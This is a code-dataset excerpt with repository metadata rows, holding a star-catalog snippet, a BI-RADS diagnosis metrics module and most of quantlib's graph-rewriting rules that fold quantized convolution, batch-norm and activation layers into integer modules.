name = str(center) + "_" + str(ra_span) + "_" + str(dec_span)
# Determine the path to the catalog file
self.path = fs.join(stars_catalog_path, name + ".cat")
# Check whether the local file exists
if not fs.is_file(self.path):
# Get the table
self.table = catalogs.create_star_catalog(frame_or_wcs, catalog_names)
# Save the table
tables.write(self.table, self.path, format="ascii.ecsv")
# Load the table
else: self.table = tables.from_file(self.path, format="ascii.ecsv")
# -----------------------------------------------------------------
def saveto(self, path):
"""
This function ...
:param path:
:return:
"""
tables.write(self.table, path, format="ascii.ecsv")
# -----------------------------------------------------------------
| 31.485915 | 97 | 0.547976 | 3,374 | 0.754472 | 0 | 0 | 0 | 0 | 0 | 0 | 2,269 | 0.507379 |
5fcaa9f085f2d78ed188a66c5c69d0728b2a6373 | 2,640 | py | Python | tools/common.py | JamzumSum/yNet | 78506738e64321cfd26f0af70a62dd2119948e39 | [
"MIT"
] | 5 | 2021-06-09T02:11:19.000Z | 2021-10-04T09:00:31.000Z | tools/common.py | JamzumSum/yNet | 78506738e64321cfd26f0af70a62dd2119948e39 | [
"MIT"
] | null | null | null | tools/common.py | JamzumSum/yNet | 78506738e64321cfd26f0af70a62dd2119948e39 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from typing import Iterable
import torch
from torchmetrics import ConfusionMatrix
from collections import defaultdict
argmax = lambda l: l.index(max(l))
BIRAD_MAP = ['2', '3', '4', '5']
def _lbm():
global BIRAD_MAP
BIRAD_MAP = torch.load("./data/BIRADs/meta.pt")['classname']['Yb']
@dataclass(frozen=True)
class DiagBag:
pid: str
pm: float
pb: list
ym: int
yb: int
@staticmethod
def header():
return [
'pid', 'malignant prob', 'BIRADs prob distrib', 'malignant anno',
'BIRADs anno'
]
def __iter__(self):
yield self.pid
yield f"{self.pm:.4f}"
yield '-' if self.pb is None else f"{BIRAD_MAP[argmax(self.pb)]}类 ({', '.join('%.4f' % i for i in self.pb)})"
yield str(self.ym)
yield '-' if self.yb is None else f"{BIRAD_MAP[self.yb]}类"
class Counter:
def __init__(self, diags: Iterable[DiagBag], thresh: float) -> None:
self.raw = tuple(diags)
self.K = len(BIRAD_MAP)
assert self.K >= 2
self.allInOne(thresh)
def allInOne(self, thresh):
cm = ConfusionMatrix(2, threshold=thresh)
cb = ConfusionMatrix(self.K)
cbm = ConfusionMatrix(self.K)
for d in self.raw:
cm.update(preds=torch.Tensor([d.pm]), target=torch.LongTensor([d.ym]))
cbm.update(preds=torch.Tensor([d.pb]), target=torch.LongTensor([int(d.pm > thresh)]))
if d.yb is not None:
cb.update(preds=torch.Tensor([d.pb]), target=torch.LongTensor([[d.yb]]))
self.cm = cm.compute()
self.cb = cb.compute()
self.cbm = cbm.compute()
@staticmethod
def _acc(cf):
return float(cf.diag().sum() / cf.sum())
@staticmethod
def _prec(cf: torch.Tensor):
return (cf.diag() / cf.sum(dim=1).clamp_min_(1e-5)).tolist()
@staticmethod
def _recall(cf: torch.Tensor):
return (cf.diag() / cf.sum(dim=0).clamp_min_(1e-5)).tolist()
@property
def pb_acc(self):
return self._acc(self.cb)
@property
def pm_acc(self):
return self._acc(self.cm)
@property
def pb_precision(self):
return self._prec(self.cb)
@property
def pb_recall(self):
return self._recall(self.cb)
@property
def pm_precision(self):
return self._prec(self.cm)
@property
def pm_recall(self):
return self._recall(self.cm)
@property
def m_birad(self):
return self.cbm[1].int().tolist()
@property
def b_birad(self):
return self.cbm[0].int().tolist()
_lbm()
| 24.220183 | 117 | 0.591667 | 2,277 | 0.861195 | 289 | 0.109304 | 1,441 | 0.545008 | 0 | 0 | 246 | 0.093041 |
5fcb3be04540c3af2931e387575e6b75d7da7f7e | 34,361 | py | Python | quantlib/backends/twn_accelerator/grrules/dporules.py | mdatres/quantlab | 09fb24ede78f49768f829afe0fac2ac291b8fd4f | [
"Apache-2.0"
] | null | null | null | quantlib/backends/twn_accelerator/grrules/dporules.py | mdatres/quantlab | 09fb24ede78f49768f829afe0fac2ac291b8fd4f | [
"Apache-2.0"
] | null | null | null | quantlib/backends/twn_accelerator/grrules/dporules.py | mdatres/quantlab | 09fb24ede78f49768f829afe0fac2ac291b8fd4f | [
"Apache-2.0"
] | 1 | 2022-01-02T10:10:46.000Z | 2022-01-02T10:10:46.000Z | #
# dporules.py
#
# Author(s):
# Matteo Spallanzani <[email protected]>
#
# Copyright (c) 2020-2021 ETH Zurich.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import networkx as nx
from collections import OrderedDict
import itertools
import math
import torch
import torch.nn as nn
import quantlib.editing.graphs as qg
from quantlib.editing.graphs.grrules.dporules import DPORule
from quantlib.editing.graphs.grrules import Seeker
from quantlib.editing.graphs.graphs.nodes import Bipartite, __NODE_ID_FORMAT__, PyTorchNode
import quantlib.algorithms as qa
from .folding import foldsteinqconvbnste, foldconvbnste, foldsteinqconvbn
__all__ = [
'FoldSTEINQConvBNSTETypeARule',
'FoldSTEINQConvBNSTETypeBRule',
'FoldConvBNSTERule',
'FoldSTEINQConvBNRule',
]
class FoldSTEINQConvBNSTETypeARule(DPORule): # w/o max pooling
def __init__(self, gamma_int_bits=10, gamma_frac_bits=17, beta_int_bits=8, beta_frac_bits=0):
self._gamma_int_bits = gamma_int_bits
self._gamma_frac_bits = gamma_frac_bits
self._beta_int_bits = beta_int_bits
self._beta_frac_bits = beta_frac_bits
# Nodes of the interface
K_types = OrderedDict()
K_types.update({'HPTout': qg.graphs.HelperOutputPrecisionTunnel.__name__})
K_types.update({'HPTin': qg.graphs.HelperInputPrecisionTunnel.__name__})
K_types = OrderedDict([('/'.join(['K-term', k]), v) for k, v in K_types.items()])
# Nodes in the core template graph
LK_types = OrderedDict()
LK_types.update({'STEin': qa.ste.STEActivation.__name__})
LK_types.update({'Conv': qa.inq.INQConv2d.__name__})
LK_types.update({'BatchNorm': nn.BatchNorm2d.__name__})
LK_types.update({'ReLU': nn.ReLU.__name__})
LK_types.update({'STEout': qa.ste.STEActivation.__name__})
LK_types = OrderedDict([('/'.join(['L-term', k]), v) for k, v in LK_types.items()])
# Nodes in the core replacement graph
RK_types = OrderedDict()
RK_types.update({'TWConv': nn.Conv2d.__name__})
RK_types.update({'XPAffine': nn.Conv2d.__name__})
RK_types.update({'S&C': qg.graphs.ShiftAndClip.__name__})
RK_types = OrderedDict([('/'.join(['R-term', k]), v) for k, v in RK_types.items()])
K_node_IDs = list(K_types.keys())
LK_node_IDs = list(LK_types.keys())
RK_node_IDs = list(RK_types.keys())
# define the template graph L [L-term]
L_node_IDs = [K_node_IDs[0]] + LK_node_IDs + [K_node_IDs[-1]]
self.L = nx.DiGraph()
# Define arcs between nodes in full template graph
self.L.add_edges_from({(u, v) for u, v in zip(L_node_IDs[:-1], L_node_IDs[1:])})
# Here, graph is only operation nodes
# Necessary for seeker
nx.set_node_attributes(self.L, {vL: Bipartite.KERNEL for vL in set(self.L.nodes)}, 'bipartite')
nx.set_node_attributes(self.L, {**K_types, **LK_types}, 'type')
# define the context (sub-)graph K [K-term]
VK = set(K_node_IDs) # precision tunnel nodes define the context graph
self.K = self.L.subgraph(VK)
# define the template (sub-)graph L\K
VLK = set(self.L.nodes).difference(set(self.K.nodes))
self.LK = self.L.subgraph(VLK)
# define the replacement (sub-)graph R\K ["gluing" R\K to K yields the graph R, i.e., the R-term]
self.RK = nx.DiGraph()
self.RK.add_edges_from({(u, v) for u, v in zip(RK_node_IDs[:-1], RK_node_IDs[1:])})
nx.set_node_attributes(self.RK, {vRK: Bipartite.KERNEL for vRK in set(self.RK.nodes)}, 'bipartite')
nx.set_node_attributes(self.RK, RK_types, 'type')
# define the arcs that go from the vertices of K to those of R\K, and viceversa
E_K2RK = {(K_node_IDs[0], RK_node_IDs[0])}
E_RK2K = {(RK_node_IDs[-1], K_node_IDs[-1])}
E_K2RK2K = E_K2RK | E_RK2K
# disintegrate `E_K2RK` and `E_RK2K` along fibres to speed up rule application
# A fibre is kind of like fixing one argument of a two input one output function and looking at all possible outputs
self.F_K2RK = {vK: set(arc for arc in E_K2RK if arc[0] == vK) for vK in set(self.K.nodes)}
self.F_RK2K = {vK: set(arc for arc in E_RK2K if arc[1] == vK) for vK in set(self.K.nodes)}
# # glue together the (sub-)graphs L\K and R\K along the vertices of K
# self.S = nx.compose(self.L, self.RK)
# self.S.add_edges_from(E_K2RK2K)
# since the GRR's L-term has been modified, rebuild the seeker
self.seeker = Seeker(self.L)
# this machinery can generate always-new identifiers for different rule applications
self._counter = itertools.count()
def _get_rule_count(self):
rule_count = ''.join(['FINQBNSTETA', __NODE_ID_FORMAT__.format(next(self._counter))])
return rule_count
def core(self, HI, g, nodes_dict):
# generate the substitute (sub-)graph J\I
rule_count = self._get_rule_count()
g_RK2JI = {vRK: '_'.join([rule_count, vRK.replace('R-term/', '')]) for vRK in set(self.RK.nodes)}
JI = nx.relabel_nodes(self.RK, g_RK2JI, copy=True)
# get pointers to the old modules;
# these pointers will enable two actions:
# 1. extracting the arguments required to perform the folding
# 2. extracting the parameters to instantiate the new modules
g_L2H = {vL: vH for vH, vL in g.items()}
mstein = nodes_dict[g_L2H['/'.join(['L-term', 'STEin'])]].nobj
minq2d = nodes_dict[g_L2H['/'.join(['L-term', 'Conv'])]].nobj
mbn2d = nodes_dict[g_L2H['/'.join(['L-term', 'BatchNorm'])]].nobj
msteout = nodes_dict[g_L2H['/'.join(['L-term', 'STEout'])]].nobj
# fold
weight, gamma, beta = foldsteinqconvbnste(mstein.num_levels, mstein.abs_max_value,
minq2d.weight_frozen,
mbn2d.running_mean, mbn2d.running_var, mbn2d.eps, mbn2d.weight, mbn2d.bias,
msteout.num_levels, msteout.abs_max_value,
gamma_int_bits=self._gamma_int_bits, gamma_frac_bits=self._gamma_frac_bits,
beta_int_bits=self._beta_int_bits, beta_frac_bits=self._beta_frac_bits)
# build the new modules
mtwconv = nn.Conv2d(minq2d.in_channels, minq2d.out_channels, minq2d.kernel_size,
stride=minq2d.stride, padding=minq2d.padding, dilation=minq2d.dilation, groups=minq2d.groups,
bias=minq2d.bias is not None).to(torch.device('cpu'))
mtwconv.weight.data = weight
mxpaffine = nn.Conv2d(minq2d.out_channels, minq2d.out_channels, 1,
stride=1, padding=0, groups=minq2d.out_channels,
bias=True).to(torch.device('cpu'))
mxpaffine.weight.data = gamma
mxpaffine.bias.data = beta
msandc = qg.graphs.ShiftAndClip(n_bits=math.ceil(math.log(msteout.num_levels, 2)),
shift=self._gamma_frac_bits,
signed=True, only_positive=True).to(torch.device('cpu'))
# register the newly created nodes
vJI_2_ptnode = {}
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'TWConv'])]] = PyTorchNode(mtwconv)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'XPAffine'])]] = PyTorchNode(mxpaffine)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'S&C'])]] = PyTorchNode(msandc)
return JI, vJI_2_ptnode
# G: Full/original graph
# nodes_dict: Mapping between node identifiers of G and actual underlying objects
# g: One instance of all occurences of the template in G, i.e. one application point for the replacement rule -> one morphism
def apply(self, G, nodes_dict, g):
# create new containers
G = G.copy()
# Dictionary mapping of node identifiers to a payload
# keys in nodes_dict should be the same as G.nodes
nodes_dict = {**nodes_dict}
# characterise the match graph H
# Occurence of template in the graph
# SPMATTEO: Some assumptions to discuss
VI = {vH for vH, vL in g.items() if vL in set(self.K.nodes)} # Occurence of context
VHI = {vH for vH, vL in g.items() if vL not in set(self.K.nodes)} # Occurence of core template
HI = G.subgraph(VHI) # HI is the subgraph induced by the set of nodes VHI
# generate the substitute (sub-)graph J\I (completely detached from G)
# Instantiate blueprint of the replacement graph
JI, vJI_2_ptnode = self.core(HI, g, nodes_dict)
# add the substitute (sub-)graph J\I to the main graph G
G = nx.compose(G, JI) # G now has two connected but 'independent' subgraphs
nodes_dict.update(vJI_2_ptnode) # Add new payloads from substitute graph
# glue the substitute (sub-)graph J\I to the interface (sub-)graph I
JI2RK_morphisms = Seeker(self.RK).get_morphisms(JI)
assert len(JI2RK_morphisms) == 1
g_JI2RK = JI2RK_morphisms[0]
g_RK2JI = {vRK: vJI for vJI, vRK in g_JI2RK.items()}
for vI in VI: # for each node in the interface subgraph of G
vK = g[vI]
G.add_edges_from({(vI, g_RK2JI[vRK]) for (_, vRK) in self.F_K2RK[vK]}) # incoming interface connections from G to substitute graph
G.add_edges_from({(g_RK2JI[vRK], vI) for (vRK, _) in self.F_RK2K[vK]}) # outcoming interface connections from substitute graph to G
# the new modules are fully integerized, so the precision tunnel should not embed integer numbers in floating point numbers
# Specific to integer arithmetic transformation -> No relation to graph editing, per-se
if nodes_dict[vI].ntype == qg.graphs.HelperOutputPrecisionTunnel.__name__:
nodes_dict[vI] = PyTorchNode(qg.graphs.HelperOutputPrecisionTunnel(1.0))
elif nodes_dict[vI].ntype == qg.graphs.HelperInputPrecisionTunnel.__name__:
nodes_dict[vI] = PyTorchNode(qg.graphs.HelperInputPrecisionTunnel(1.0))
else:
raise TypeError # interface nodes should be objects of class `qg.graphs.HelperPrecisionTunnel` only
# discard the match (sub-)graph H\I
# Assumption: removing a node also removes all arcs pointing to or from that node
G.remove_nodes_from(set(HI.nodes))
# Remove the payload, i.e. underying objects, accordingly
for vHI in VHI:
del nodes_dict[vHI]
return G, nodes_dict
def seek(self, G, nodes_dict):
gs = self.seeker.get_morphisms(G)
return gs
class FoldSTEINQConvBNSTETypeBRule(DPORule): # w/o max pooling
def __init__(self, gamma_int_bits=10, gamma_frac_bits=17, beta_int_bits=8, beta_frac_bits=0):
self._gamma_int_bits = gamma_int_bits
self._gamma_frac_bits = gamma_frac_bits
self._beta_int_bits = beta_int_bits
self._beta_frac_bits = beta_frac_bits
K_types = OrderedDict()
K_types.update({'HPTout': qg.graphs.HelperOutputPrecisionTunnel.__name__})
K_types.update({'HPTin': qg.graphs.HelperInputPrecisionTunnel.__name__})
K_types = OrderedDict([('/'.join(['K-term', k]), v) for k, v in K_types.items()])
LK_types = OrderedDict()
LK_types.update({'STEin': qa.ste.STEActivation.__name__})
LK_types.update({'Conv': qa.inq.INQConv2d.__name__})
LK_types.update({'BatchNorm': nn.BatchNorm2d.__name__})
LK_types.update({'ReLU': nn.ReLU.__name__})
LK_types.update({'MaxPool': nn.MaxPool2d.__name__})
LK_types.update({'STEout': qa.ste.STEActivation.__name__})
LK_types = OrderedDict([('/'.join(['L-term', k]), v) for k, v in LK_types.items()])
RK_types = OrderedDict()
RK_types.update({'TWConv': nn.Conv2d.__name__})
RK_types.update({'XPAffine': nn.Conv2d.__name__})
RK_types.update({'S&C': qg.graphs.ShiftAndClip.__name__})
RK_types.update({'MaxPool': nn.MaxPool2d.__name__})
RK_types = OrderedDict([('/'.join(['R-term', k]), v) for k, v in RK_types.items()])
K_node_IDs = list(K_types.keys())
LK_node_IDs = list(LK_types.keys())
RK_node_IDs = list(RK_types.keys())
# define the template graph L [L-term]
L_node_IDs = [K_node_IDs[0]] + LK_node_IDs + [K_node_IDs[-1]]
self.L = nx.DiGraph()
self.L.add_edges_from({(u, v) for u, v in zip(L_node_IDs[:-1], L_node_IDs[1:])})
nx.set_node_attributes(self.L, {vL: Bipartite.KERNEL for vL in set(self.L.nodes)}, 'bipartite')
nx.set_node_attributes(self.L, {**K_types, **LK_types}, 'type')
# define the context (sub-)graph K [K-term]
VK = set(K_node_IDs) # precision tunnel nodes define the context graph
self.K = self.L.subgraph(VK)
# define the template (sub-)graph L\K
VLK = set(self.L.nodes).difference(set(self.K.nodes))
self.LK = self.L.subgraph(VLK)
# define the replacement (sub-)graph R\K ["gluing" R\K to K yields the graph R, i.e., the R-term]
self.RK = nx.DiGraph()
self.RK.add_edges_from({(u, v) for u, v in zip(RK_node_IDs[:-1], RK_node_IDs[1:])})
nx.set_node_attributes(self.RK, {vRK: Bipartite.KERNEL for vRK in set(self.RK.nodes)}, 'bipartite')
nx.set_node_attributes(self.RK, RK_types, 'type')
# define the arcs that go from the vertices of K to those of R\K, and viceversa
E_K2RK = {(K_node_IDs[0], RK_node_IDs[0])}
E_RK2K = {(RK_node_IDs[-1], K_node_IDs[-1])}
E_K2RK2K = E_K2RK | E_RK2K
# disintegrate `E_K2RK` and `E_RK2K` along fibres to speed up rule application
self.F_K2RK = {vK: set(arc for arc in E_K2RK if arc[0] == vK) for vK in set(self.K.nodes)}
self.F_RK2K = {vK: set(arc for arc in E_RK2K if arc[1] == vK) for vK in set(self.K.nodes)}
# # glue together the (sub-)graphs L\K and R\K along the vertices of K
# self.S = nx.compose(self.L, self.RK)
# self.S.add_edges_from(E_K2RK2K)
# since the GRR's L-term has been modified, rebuild the seeker
self.seeker = Seeker(self.L)
# this machinery can generate always-new identifiers for different rule applications
self._counter = itertools.count()
def _get_rule_count(self):
rule_count = ''.join(['FINQBNSTETB', __NODE_ID_FORMAT__.format(next(self._counter))])
return rule_count
def core(self, HI, g, nodes_dict):
# generate the substitute (sub-)graph J\I
rule_count = self._get_rule_count()
g_RK2JI = {vRK: '_'.join([rule_count, vRK.replace('R-term/', '')]) for vRK in set(self.RK.nodes)}
JI = nx.relabel_nodes(self.RK, g_RK2JI, copy=True)
# get pointers to the old modules;
# these pointers will enable two actions:
# 1. extracting the arguments required to perform the folding
# 2. extracting the parameters to instantiate the new modules
g_L2H = {vL: vH for vH, vL in g.items()}
mstein = nodes_dict[g_L2H['/'.join(['L-term', 'STEin'])]].nobj
minq2d = nodes_dict[g_L2H['/'.join(['L-term', 'Conv'])]].nobj
mbn2d = nodes_dict[g_L2H['/'.join(['L-term', 'BatchNorm'])]].nobj
msteout = nodes_dict[g_L2H['/'.join(['L-term', 'STEout'])]].nobj
mmxpold = nodes_dict[g_L2H['/'.join(['L-term', 'MaxPool'])]].nobj
# fold
weight, gamma, beta = foldsteinqconvbnste(mstein.num_levels, mstein.abs_max_value,
minq2d.weight_frozen,
mbn2d.running_mean, mbn2d.running_var, mbn2d.eps, mbn2d.weight, mbn2d.bias,
msteout.num_levels, msteout.abs_max_value,
gamma_int_bits=self._gamma_int_bits, gamma_frac_bits=self._gamma_frac_bits,
beta_int_bits=self._beta_int_bits, beta_frac_bits=self._beta_frac_bits)
# build the new modules
mtwconv = nn.Conv2d(minq2d.in_channels, minq2d.out_channels, minq2d.kernel_size,
stride=minq2d.stride, padding=minq2d.padding, dilation=minq2d.dilation, groups=minq2d.groups,
bias=minq2d.bias is not None).to(torch.device('cpu'))
mtwconv.weight.data = weight
mxpaffine = nn.Conv2d(minq2d.out_channels, minq2d.out_channels, 1,
stride=1, padding=0, groups=minq2d.out_channels,
bias=True).to(torch.device('cpu'))
mxpaffine.weight.data = gamma
mxpaffine.bias.data = beta
msandc = qg.graphs.ShiftAndClip(n_bits=math.ceil(math.log(msteout.num_levels, 2)),
shift=self._gamma_frac_bits,
signed=True, only_positive=True).to(torch.device('cpu'))
mmxpnew = nn.MaxPool2d(kernel_size=mmxpold.kernel_size, stride=mmxpold.stride, padding=mmxpold.padding)
# register the newly created nodes
vJI_2_ptnode = {}
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'TWConv'])]] = PyTorchNode(mtwconv)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'XPAffine'])]] = PyTorchNode(mxpaffine)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'S&C'])]] = PyTorchNode(msandc)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'MaxPool'])]] = PyTorchNode(mmxpnew)
return JI, vJI_2_ptnode
def apply(self, G, nodes_dict, g):
# create new containers
G = G.copy()
nodes_dict = {**nodes_dict}
# characterise the match graph H
VI = {vH for vH, vL in g.items() if vL in set(self.K.nodes)}
VHI = {vH for vH, vL in g.items() if vL not in set(self.K.nodes)}
HI = G.subgraph(VHI)
# generate the substitute (sub-)graph J\I
JI, vJI_2_ptnode = self.core(HI, g, nodes_dict)
# add the substitute (sub-)graph J\I to the main graph G
G = nx.compose(G, JI)
nodes_dict.update(vJI_2_ptnode)
# glue the substitute (sub-)graph J\I to the interface (sub-)graph I
JI2RK_morphisms = Seeker(self.RK).get_morphisms(JI)
assert len(JI2RK_morphisms) == 1
g_JI2RK = JI2RK_morphisms[0]
g_RK2JI = {vRK: vJI for vJI, vRK in g_JI2RK.items()}
for vI in VI:
vK = g[vI]
G.add_edges_from({(vI, g_RK2JI[vRK]) for (_, vRK) in self.F_K2RK[vK]})
G.add_edges_from({(g_RK2JI[vRK], vI) for (vRK, _) in self.F_RK2K[vK]})
# the new modules are fully integerized, so the precision tunnel should not embed integer numbers in floating point numbers
if nodes_dict[vI].ntype == qg.graphs.HelperOutputPrecisionTunnel.__name__:
nodes_dict[vI] = PyTorchNode(qg.graphs.HelperOutputPrecisionTunnel(1.0))
elif nodes_dict[vI].ntype == qg.graphs.HelperInputPrecisionTunnel.__name__:
nodes_dict[vI] = PyTorchNode(qg.graphs.HelperInputPrecisionTunnel(1.0))
else:
raise TypeError # interface nodes should be objects of class `qg.graphs.HelperPrecisionTunnel` only
# discard the match (sub-)graph H\I
G.remove_nodes_from(set(HI.nodes))
for vHI in VHI:
del nodes_dict[vHI]
return G, nodes_dict
def seek(self, G, nodes_dict):
gs = self.seeker.get_morphisms(G)
return gs
class FoldConvBNSTERule(DPORule):
def __init__(self):
K_types = OrderedDict()
K_types.update({'HI': qg.graphs.HelperInput.__name__})
K_types.update({'HPTin': qg.graphs.HelperInputPrecisionTunnel.__name__})
K_types = OrderedDict([('/'.join(['K-term', k]), v) for k, v in K_types.items()])
LK_types = OrderedDict()
LK_types.update({'Conv': nn.Conv2d.__name__})
LK_types.update({'BatchNorm': nn.BatchNorm2d.__name__})
LK_types.update({'ReLU': nn.ReLU.__name__})
LK_types.update({'STE': qa.ste.STEActivation.__name__})
LK_types = OrderedDict([('/'.join(['L-term', k]), v) for k, v in LK_types.items()])
RK_types = OrderedDict()
RK_types.update({'Conv': nn.Conv2d.__name__})
RK_types.update({'F&C': qg.graphs.FloorAndClip.__name__})
RK_types = OrderedDict([('/'.join(['R-term', k]), v) for k, v in RK_types.items()])
K_node_IDs = list(K_types.keys())
LK_node_IDs = list(LK_types.keys())
RK_node_IDs = list(RK_types.keys())
# define the template graph L [L-term]
L_node_IDs = [K_node_IDs[0]] + LK_node_IDs + [K_node_IDs[-1]]
self.L = nx.DiGraph()
self.L.add_edges_from({(u, v) for u, v in zip(L_node_IDs[:-1], L_node_IDs[1:])})
nx.set_node_attributes(self.L, {vL: Bipartite.KERNEL for vL in set(self.L.nodes)}, 'bipartite')
nx.set_node_attributes(self.L, {**K_types, **LK_types}, 'type')
# define the context (sub-)graph K [K-term]
VK = set(K_node_IDs) # precision tunnel nodes define the context graph
self.K = self.L.subgraph(VK)
# define the template (sub-)graph L\K
VLK = set(self.L.nodes).difference(set(self.K.nodes))
self.LK = self.L.subgraph(VLK)
# define the replacement (sub-)graph R\K ["gluing" R\K to K yields the graph R, i.e., the R-term]
self.RK = nx.DiGraph()
self.RK.add_edges_from({(u, v) for u, v in zip(RK_node_IDs[:-1], RK_node_IDs[1:])})
nx.set_node_attributes(self.RK, {vRK: Bipartite.KERNEL for vRK in set(self.RK.nodes)}, 'bipartite')
nx.set_node_attributes(self.RK, RK_types, 'type')
# define the arcs that go from the vertices of K to those of R\K, and viceversa
E_K2RK = {(K_node_IDs[0], RK_node_IDs[0])}
E_RK2K = {(RK_node_IDs[-1], K_node_IDs[-1])}
E_K2RK2K = E_K2RK | E_RK2K
# disintegrate `E_K2RK` and `E_RK2K` along fibres to speed up rule application
self.F_K2RK = {vK: set(arc for arc in E_K2RK if arc[0] == vK) for vK in set(self.K.nodes)}
self.F_RK2K = {vK: set(arc for arc in E_RK2K if arc[1] == vK) for vK in set(self.K.nodes)}
# # glue together the (sub-)graphs L\K and R\K along the vertices of K
# self.S = nx.compose(self.L, self.RK)
# self.S.add_edges_from(E_K2RK2K)
# since the GRR's L-term has been modified, rebuild the seeker
self.seeker = Seeker(self.L)
# this machinery can generate always-new identifiers for different rule applications
self._counter = itertools.count()
def _get_rule_count(self):
rule_count = ''.join(['FCBNSTE', __NODE_ID_FORMAT__.format(next(self._counter))])
return rule_count
def core(self, HI, g, nodes_dict):
# generate the substitute (sub-)graph J\I
rule_count = self._get_rule_count()
g_RK2JI = {vRK: '_'.join([rule_count, vRK.replace('R-term/', '')]) for vRK in set(self.RK.nodes)}
JI = nx.relabel_nodes(self.RK, g_RK2JI, copy=True)
# get pointers to the old modules;
# these pointers will enable two actions:
# 1. extracting the arguments required to perform the folding
# 2. extracting the parameters to instantiate the new modules
g_L2H = {vL: vH for vH, vL in g.items()}
mconvold = nodes_dict[g_L2H['/'.join(['L-term', 'Conv'])]].nobj
mbn2d = nodes_dict[g_L2H['/'.join(['L-term', 'BatchNorm'])]].nobj
mste = nodes_dict[g_L2H['/'.join(['L-term', 'STE'])]].nobj
# fold
weight, bias = foldconvbnste(mconvold.weight,
mbn2d.running_mean, mbn2d.running_var, mbn2d.eps, mbn2d.weight, mbn2d.bias,
mste.num_levels, mste.abs_max_value)
# build the new modules
mconvnew = nn.Conv2d(mconvold.in_channels, mconvold.out_channels, mconvold.kernel_size,
stride=mconvold.stride, padding=mconvold.padding, dilation=mconvold.dilation, groups=mconvold.groups,
bias=True).to(torch.device('cpu'))
mconvnew.weight.data = weight
mconvnew.bias.data = bias
mfandc = qg.graphs.FloorAndClip(n_bits=math.ceil(math.log(mste.num_levels, 2)),
signed=True, only_positive=True).to(torch.device('cpu'))
# register the newly created nodes
vJI_2_ptnode = {}
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'Conv'])]] = PyTorchNode(mconvnew)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'F&C'])]] = PyTorchNode(mfandc)
return JI, vJI_2_ptnode
def apply(self, G, nodes_dict, g):
# create new containers
G = G.copy()
nodes_dict = {**nodes_dict}
# characterise the match graph H
VI = {vH for vH, vL in g.items() if vL in set(self.K.nodes)}
VHI = {vH for vH, vL in g.items() if vL not in set(self.K.nodes)}
HI = G.subgraph(VHI)
# generate the substitute (sub-)graph J\I
JI, vJI_2_ptnode = self.core(HI, g, nodes_dict)
# add the substitute (sub-)graph J\I to the main graph G
G = nx.compose(G, JI)
nodes_dict.update(vJI_2_ptnode)
# glue the substitute (sub-)graph J\I to the interface (sub-)graph I
JI2RK_morphisms = Seeker(self.RK).get_morphisms(JI)
assert len(JI2RK_morphisms) == 1
g_JI2RK = JI2RK_morphisms[0]
g_RK2JI = {vRK: vJI for vJI, vRK in g_JI2RK.items()}
for vI in VI:
vK = g[vI]
G.add_edges_from({(vI, g_RK2JI[vRK]) for (_, vRK) in self.F_K2RK[vK]})
G.add_edges_from({(g_RK2JI[vRK], vI) for (vRK, _) in self.F_RK2K[vK]})
# the new modules are fully integerized, so the precision tunnel should not embed integer numbers in floating point numbers
if nodes_dict[vI].ntype == qg.graphs.HelperInput.__name__:
pass
elif nodes_dict[vI].ntype == qg.graphs.HelperInputPrecisionTunnel.__name__:
nodes_dict[vI] = PyTorchNode(qg.graphs.HelperInputPrecisionTunnel(1.0))
else:
raise TypeError # interface nodes should be objects of class `qg.graphs.HelperPrecisionTunnel` only
# discard the match (sub-)graph H\I
G.remove_nodes_from(set(HI.nodes))
for vHI in VHI:
del nodes_dict[vHI]
return G, nodes_dict
def seek(self, G, nodes_dict):
gs = self.seeker.get_morphisms(G)
return gs
class FoldSTEINQConvBNRule(DPORule):
def __init__(self):
K_types = OrderedDict()
K_types.update({'HI': qg.graphs.HelperOutputPrecisionTunnel.__name__})
K_types.update({'MaxPool': nn.MaxPool2d.__name__})
K_types = OrderedDict([('/'.join(['K-term', k]), v) for k, v in K_types.items()])
LK_types = OrderedDict()
LK_types.update({'STE': qa.ste.STEActivation.__name__})
LK_types.update({'INQConv': qa.inq.INQConv2d.__name__})
LK_types.update({'BatchNorm': nn.BatchNorm2d.__name__})
LK_types.update({'ReLU': nn.ReLU.__name__})
LK_types = OrderedDict([('/'.join(['L-term', k]), v) for k, v in LK_types.items()])
RK_types = OrderedDict()
RK_types.update({'Conv': nn.Conv2d.__name__})
RK_types.update({'ReLU': nn.ReLU.__name__})
RK_types = OrderedDict([('/'.join(['R-term', k]), v) for k, v in RK_types.items()])
K_node_IDs = list(K_types.keys())
LK_node_IDs = list(LK_types.keys())
RK_node_IDs = list(RK_types.keys())
# define the template graph L [L-term]
L_node_IDs = [K_node_IDs[0]] + LK_node_IDs + [K_node_IDs[-1]]
self.L = nx.DiGraph()
self.L.add_edges_from({(u, v) for u, v in zip(L_node_IDs[:-1], L_node_IDs[1:])})
nx.set_node_attributes(self.L, {vL: Bipartite.KERNEL for vL in set(self.L.nodes)}, 'bipartite')
nx.set_node_attributes(self.L, {**K_types, **LK_types}, 'type')
# define the context (sub-)graph K [K-term]
VK = set(K_node_IDs) # precision tunnel nodes define the context graph
self.K = self.L.subgraph(VK)
# define the template (sub-)graph L\K
VLK = set(self.L.nodes).difference(set(self.K.nodes))
self.LK = self.L.subgraph(VLK)
# define the replacement (sub-)graph R\K ["gluing" R\K to K yields the graph R, i.e., the R-term]
self.RK = nx.DiGraph()
self.RK.add_edges_from({(u, v) for u, v in zip(RK_node_IDs[:-1], RK_node_IDs[1:])})
nx.set_node_attributes(self.RK, {vRK: Bipartite.KERNEL for vRK in set(self.RK.nodes)}, 'bipartite')
nx.set_node_attributes(self.RK, RK_types, 'type')
# define the arcs that go from the vertices of K to those of R\K, and viceversa
